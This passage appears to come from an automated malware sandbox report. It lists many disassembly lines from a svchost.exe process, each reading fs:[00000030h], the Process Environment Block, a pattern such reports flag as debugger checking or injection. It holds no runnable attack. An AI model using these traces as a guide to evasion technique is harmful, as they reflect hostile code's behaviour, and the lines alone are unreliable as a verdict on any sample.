                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB019F mov eax, dword ptr fs:[00000030h]2_2_03BB019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB019F mov eax, dword ptr fs:[00000030h]2_2_03BB019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2A197 mov eax, dword ptr fs:[00000030h]2_2_03B2A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2A197 mov eax, dword ptr fs:[00000030h]2_2_03B2A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2A197 mov eax, dword ptr fs:[00000030h]2_2_03B2A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C061E5 mov eax, dword ptr fs:[00000030h]2_2_03C061E5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B70185 mov eax, dword ptr fs:[00000030h]2_2_03B70185
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BEC188 mov eax, dword ptr fs:[00000030h]2_2_03BEC188
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BEC188 mov eax, dword ptr fs:[00000030h]2_2_03BEC188
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BD4180 mov eax, dword ptr fs:[00000030h]2_2_03BD4180
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BD4180 mov eax, dword ptr fs:[00000030h]2_2_03BD4180
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B601F8 mov eax, dword ptr fs:[00000030h]2_2_03B601F8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BAE1D0 mov eax, dword ptr fs:[00000030h]2_2_03BAE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BAE1D0 mov eax, dword ptr fs:[00000030h]2_2_03BAE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BAE1D0 mov ecx, dword ptr fs:[00000030h]2_2_03BAE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BAE1D0 mov eax, dword ptr fs:[00000030h]2_2_03BAE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BAE1D0 mov eax, dword ptr fs:[00000030h]2_2_03BAE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BF61C3 mov eax, dword ptr fs:[00000030h]2_2_03BF61C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BF61C3 mov eax, dword ptr fs:[00000030h]2_2_03BF61C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B60124 mov eax, dword ptr fs:[00000030h]2_2_03B60124
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BDA118 mov ecx, dword ptr fs:[00000030h]2_2_03BDA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BDA118 mov eax, dword ptr fs:[00000030h]2_2_03BDA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BDA118 mov eax, dword ptr fs:[00000030h]2_2_03BDA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BDA118 mov eax, dword ptr fs:[00000030h]2_2_03BDA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BF0115 mov eax, dword ptr fs:[00000030h]2_2_03BF0115
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BDE10E mov eax, dword ptr fs:[00000030h]2_2_03BDE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BDE10E mov ecx, dword ptr fs:[00000030h]2_2_03BDE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BDE10E mov eax, dword ptr fs:[00000030h]2_2_03BDE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BDE10E mov eax, dword ptr fs:[00000030h]2_2_03BDE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BDE10E mov ecx, dword ptr fs:[00000030h]2_2_03BDE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BDE10E mov eax, dword ptr fs:[00000030h]2_2_03BDE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BDE10E mov eax, dword ptr fs:[00000030h]2_2_03BDE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BDE10E mov ecx, dword ptr fs:[00000030h]2_2_03BDE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BDE10E mov eax, dword ptr fs:[00000030h]2_2_03BDE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BDE10E mov ecx, dword ptr fs:[00000030h]2_2_03BDE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2C156 mov eax, dword ptr fs:[00000030h]2_2_03B2C156
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BC8158 mov eax, dword ptr fs:[00000030h]2_2_03BC8158
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B36154 mov eax, dword ptr fs:[00000030h]2_2_03B36154
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B36154 mov eax, dword ptr fs:[00000030h]2_2_03B36154
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BC4144 mov eax, dword ptr fs:[00000030h]2_2_03BC4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BC4144 mov eax, dword ptr fs:[00000030h]2_2_03BC4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BC4144 mov ecx, dword ptr fs:[00000030h]2_2_03BC4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BC4144 mov eax, dword ptr fs:[00000030h]2_2_03BC4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BC4144 mov eax, dword ptr fs:[00000030h]2_2_03BC4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BF60B8 mov eax, dword ptr fs:[00000030h]2_2_03BF60B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BF60B8 mov ecx, dword ptr fs:[00000030h]2_2_03BF60B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BC80A8 mov eax, dword ptr fs:[00000030h]2_2_03BC80A8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3208A mov eax, dword ptr fs:[00000030h]2_2_03B3208A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2C0F0 mov eax, dword ptr fs:[00000030h]2_2_03B2C0F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B720F0 mov ecx, dword ptr fs:[00000030h]2_2_03B720F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2A0E3 mov ecx, dword ptr fs:[00000030h]2_2_03B2A0E3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B380E9 mov eax, dword ptr fs:[00000030h]2_2_03B380E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB60E0 mov eax, dword ptr fs:[00000030h]2_2_03BB60E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB20DE mov eax, dword ptr fs:[00000030h]2_2_03BB20DE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BC6030 mov eax, dword ptr fs:[00000030h]2_2_03BC6030
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2A020 mov eax, dword ptr fs:[00000030h]2_2_03B2A020
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2C020 mov eax, dword ptr fs:[00000030h]2_2_03B2C020
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B4E016 mov eax, dword ptr fs:[00000030h]2_2_03B4E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B4E016 mov eax, dword ptr fs:[00000030h]2_2_03B4E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B4E016 mov eax, dword ptr fs:[00000030h]2_2_03B4E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B4E016 mov eax, dword ptr fs:[00000030h]2_2_03B4E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB4000 mov ecx, dword ptr fs:[00000030h]2_2_03BB4000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BD2000 mov eax, dword ptr fs:[00000030h]2_2_03BD2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BD2000 mov eax, dword ptr fs:[00000030h]2_2_03BD2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BD2000 mov eax, dword ptr fs:[00000030h]2_2_03BD2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BD2000 mov eax, dword ptr fs:[00000030h]2_2_03BD2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BD2000 mov eax, dword ptr fs:[00000030h]2_2_03BD2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BD2000 mov eax, dword ptr fs:[00000030h]2_2_03BD2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BD2000 mov eax, dword ptr fs:[00000030h]2_2_03BD2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BD2000 mov eax, dword ptr fs:[00000030h]2_2_03BD2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5C073 mov eax, dword ptr fs:[00000030h]2_2_03B5C073
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B32050 mov eax, dword ptr fs:[00000030h]2_2_03B32050
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB6050 mov eax, dword ptr fs:[00000030h]2_2_03BB6050
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B307AF mov eax, dword ptr fs:[00000030h]2_2_03B307AF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BE47A0 mov eax, dword ptr fs:[00000030h]2_2_03BE47A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BD678E mov eax, dword ptr fs:[00000030h]2_2_03BD678E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B347FB mov eax, dword ptr fs:[00000030h]2_2_03B347FB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B347FB mov eax, dword ptr fs:[00000030h]2_2_03B347FB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B527ED mov eax, dword ptr fs:[00000030h]2_2_03B527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B527ED mov eax, dword ptr fs:[00000030h]2_2_03B527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B527ED mov eax, dword ptr fs:[00000030h]2_2_03B527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BBE7E1 mov eax, dword ptr fs:[00000030h]2_2_03BBE7E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3C7C0 mov eax, dword ptr fs:[00000030h]2_2_03B3C7C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB07C3 mov eax, dword ptr fs:[00000030h]2_2_03BB07C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6273C mov eax, dword ptr fs:[00000030h]2_2_03B6273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6273C mov ecx, dword ptr fs:[00000030h]2_2_03B6273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6273C mov eax, dword ptr fs:[00000030h]2_2_03B6273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BAC730 mov eax, dword ptr fs:[00000030h]2_2_03BAC730
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6C720 mov eax, dword ptr fs:[00000030h]2_2_03B6C720
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6C720 mov eax, dword ptr fs:[00000030h]2_2_03B6C720
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B30710 mov eax, dword ptr fs:[00000030h]2_2_03B30710
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B60710 mov eax, dword ptr fs:[00000030h]2_2_03B60710
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6C700 mov eax, dword ptr fs:[00000030h]2_2_03B6C700
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B38770 mov eax, dword ptr fs:[00000030h]2_2_03B38770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B40770 mov eax, dword ptr fs:[00000030h]2_2_03B40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B40770 mov eax, dword ptr fs:[00000030h]2_2_03B40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B40770 mov eax, dword ptr fs:[00000030h]2_2_03B40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B40770 mov eax, dword ptr fs:[00000030h]2_2_03B40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B40770 mov eax, dword ptr fs:[00000030h]2_2_03B40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B40770 mov eax, dword ptr fs:[00000030h]2_2_03B40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B40770 mov eax, dword ptr fs:[00000030h]2_2_03B40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B40770 mov eax, dword ptr fs:[00000030h]2_2_03B40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B40770 mov eax, dword ptr fs:[00000030h]2_2_03B40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B40770 mov eax, dword ptr fs:[00000030h]2_2_03B40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B40770 mov eax, dword ptr fs:[00000030h]2_2_03B40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B40770 mov eax, dword ptr fs:[00000030h]2_2_03B40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B30750 mov eax, dword ptr fs:[00000030h]2_2_03B30750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BBE75D mov eax, dword ptr fs:[00000030h]2_2_03BBE75D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72750 mov eax, dword ptr fs:[00000030h]2_2_03B72750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72750 mov eax, dword ptr fs:[00000030h]2_2_03B72750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB4755 mov eax, dword ptr fs:[00000030h]2_2_03BB4755
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6674D mov esi, dword ptr fs:[00000030h]2_2_03B6674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6674D mov eax, dword ptr fs:[00000030h]2_2_03B6674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6674D mov eax, dword ptr fs:[00000030h]2_2_03B6674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B666B0 mov eax, dword ptr fs:[00000030h]2_2_03B666B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6C6A6 mov eax, dword ptr fs:[00000030h]2_2_03B6C6A6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B34690 mov eax, dword ptr fs:[00000030h]2_2_03B34690
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B34690 mov eax, dword ptr fs:[00000030h]2_2_03B34690
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BAE6F2 mov eax, dword ptr fs:[00000030h]2_2_03BAE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BAE6F2 mov eax, dword ptr fs:[00000030h]2_2_03BAE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BAE6F2 mov eax, dword ptr fs:[00000030h]2_2_03BAE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BAE6F2 mov eax, dword ptr fs:[00000030h]2_2_03BAE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB06F1 mov eax, dword ptr fs:[00000030h]2_2_03BB06F1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB06F1 mov eax, dword ptr fs:[00000030h]2_2_03BB06F1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6A6C7 mov ebx, dword ptr fs:[00000030h]2_2_03B6A6C7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6A6C7 mov eax, dword ptr fs:[00000030h]2_2_03B6A6C7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B4E627 mov eax, dword ptr fs:[00000030h]2_2_03B4E627
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B66620 mov eax, dword ptr fs:[00000030h]2_2_03B66620
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B68620 mov eax, dword ptr fs:[00000030h]2_2_03B68620
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3262C mov eax, dword ptr fs:[00000030h]2_2_03B3262C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72619 mov eax, dword ptr fs:[00000030h]2_2_03B72619
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BAE609 mov eax, dword ptr fs:[00000030h]2_2_03BAE609
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B4260B mov eax, dword ptr fs:[00000030h]2_2_03B4260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B4260B mov eax, dword ptr fs:[00000030h]2_2_03B4260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B4260B mov eax, dword ptr fs:[00000030h]2_2_03B4260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B4260B mov eax, dword ptr fs:[00000030h]2_2_03B4260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B4260B mov eax, dword ptr fs:[00000030h]2_2_03B4260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B4260B mov eax, dword ptr fs:[00000030h]2_2_03B4260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B4260B mov eax, dword ptr fs:[00000030h]2_2_03B4260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B62674 mov eax, dword ptr fs:[00000030h]2_2_03B62674
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BF866E mov eax, dword ptr fs:[00000030h]2_2_03BF866E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BF866E mov eax, dword ptr fs:[00000030h]2_2_03BF866E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6A660 mov eax, dword ptr fs:[00000030h]2_2_03B6A660
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6A660 mov eax, dword ptr fs:[00000030h]2_2_03B6A660
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B4C640 mov eax, dword ptr fs:[00000030h]2_2_03B4C640
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B545B1 mov eax, dword ptr fs:[00000030h]2_2_03B545B1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B545B1 mov eax, dword ptr fs:[00000030h]2_2_03B545B1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB05A7 mov eax, dword ptr fs:[00000030h]2_2_03BB05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB05A7 mov eax, dword ptr fs:[00000030h]2_2_03BB05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB05A7 mov eax, dword ptr fs:[00000030h]2_2_03BB05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6E59C mov eax, dword ptr fs:[00000030h]2_2_03B6E59C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B32582 mov eax, dword ptr fs:[00000030h]2_2_03B32582
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B32582 mov ecx, dword ptr fs:[00000030h]2_2_03B32582
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B64588 mov eax, dword ptr fs:[00000030h]2_2_03B64588
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5E5E7 mov eax, dword ptr fs:[00000030h]2_2_03B5E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5E5E7 mov eax, dword ptr fs:[00000030h]2_2_03B5E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5E5E7 mov eax, dword ptr fs:[00000030h]2_2_03B5E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5E5E7 mov eax, dword ptr fs:[00000030h]2_2_03B5E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5E5E7 mov eax, dword ptr fs:[00000030h]2_2_03B5E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5E5E7 mov eax, dword ptr fs:[00000030h]2_2_03B5E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5E5E7 mov eax, dword ptr fs:[00000030h]2_2_03B5E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5E5E7 mov eax, dword ptr fs:[00000030h]2_2_03B5E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B325E0 mov eax, dword ptr fs:[00000030h]2_2_03B325E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6C5ED mov eax, dword ptr fs:[00000030h]2_2_03B6C5ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6C5ED mov eax, dword ptr fs:[00000030h]2_2_03B6C5ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B365D0 mov eax, dword ptr fs:[00000030h]2_2_03B365D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6A5D0 mov eax, dword ptr fs:[00000030h]2_2_03B6A5D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6A5D0 mov eax, dword ptr fs:[00000030h]2_2_03B6A5D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6E5CF mov eax, dword ptr fs:[00000030h]2_2_03B6E5CF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6E5CF mov eax, dword ptr fs:[00000030h]2_2_03B6E5CF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B40535 mov eax, dword ptr fs:[00000030h]2_2_03B40535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B40535 mov eax, dword ptr fs:[00000030h]2_2_03B40535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B40535 mov eax, dword ptr fs:[00000030h]2_2_03B40535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B40535 mov eax, dword ptr fs:[00000030h]2_2_03B40535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B40535 mov eax, dword ptr fs:[00000030h]2_2_03B40535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B40535 mov eax, dword ptr fs:[00000030h]2_2_03B40535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5E53E mov eax, dword ptr fs:[00000030h]2_2_03B5E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5E53E mov eax, dword ptr fs:[00000030h]2_2_03B5E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5E53E mov eax, dword ptr fs:[00000030h]2_2_03B5E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5E53E mov eax, dword ptr fs:[00000030h]2_2_03B5E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5E53E mov eax, dword ptr fs:[00000030h]2_2_03B5E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BC6500 mov eax, dword ptr fs:[00000030h]2_2_03BC6500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C04500 mov eax, dword ptr fs:[00000030h]2_2_03C04500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C04500 mov eax, dword ptr fs:[00000030h]2_2_03C04500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C04500 mov eax, dword ptr fs:[00000030h]2_2_03C04500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C04500 mov eax, dword ptr fs:[00000030h]2_2_03C04500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C04500 mov eax, dword ptr fs:[00000030h]2_2_03C04500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C04500 mov eax, dword ptr fs:[00000030h]2_2_03C04500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C04500 mov eax, dword ptr fs:[00000030h]2_2_03C04500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6656A mov eax, dword ptr fs:[00000030h]2_2_03B6656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6656A mov eax, dword ptr fs:[00000030h]2_2_03B6656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6656A mov eax, dword ptr fs:[00000030h]2_2_03B6656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B38550 mov eax, dword ptr fs:[00000030h]2_2_03B38550
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B38550 mov eax, dword ptr fs:[00000030h]2_2_03B38550
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B644B0 mov ecx, dword ptr fs:[00000030h]2_2_03B644B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BBA4B0 mov eax, dword ptr fs:[00000030h]2_2_03BBA4B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B364AB mov eax, dword ptr fs:[00000030h]2_2_03B364AB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BEA49A mov eax, dword ptr fs:[00000030h]2_2_03BEA49A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B304E5 mov ecx, dword ptr fs:[00000030h]2_2_03B304E5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6A430 mov eax, dword ptr fs:[00000030h]2_2_03B6A430
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2E420 mov eax, dword ptr fs:[00000030h]2_2_03B2E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2E420 mov eax, dword ptr fs:[00000030h]2_2_03B2E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2E420 mov eax, dword ptr fs:[00000030h]2_2_03B2E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2C427 mov eax, dword ptr fs:[00000030h]2_2_03B2C427
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB6420 mov eax, dword ptr fs:[00000030h]2_2_03BB6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB6420 mov eax, dword ptr fs:[00000030h]2_2_03BB6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB6420 mov eax, dword ptr fs:[00000030h]2_2_03BB6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB6420 mov eax, dword ptr fs:[00000030h]2_2_03BB6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB6420 mov eax, dword ptr fs:[00000030h]2_2_03BB6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB6420 mov eax, dword ptr fs:[00000030h]2_2_03BB6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB6420 mov eax, dword ptr fs:[00000030h]2_2_03BB6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B68402 mov eax, dword ptr fs:[00000030h]2_2_03B68402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B68402 mov eax, dword ptr fs:[00000030h]2_2_03B68402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B68402 mov eax, dword ptr fs:[00000030h]2_2_03B68402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5A470 mov eax, dword ptr fs:[00000030h]2_2_03B5A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5A470 mov eax, dword ptr fs:[00000030h]2_2_03B5A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5A470 mov eax, dword ptr fs:[00000030h]2_2_03B5A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BBC460 mov ecx, dword ptr fs:[00000030h]2_2_03BBC460
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BEA456 mov eax, dword ptr fs:[00000030h]2_2_03BEA456
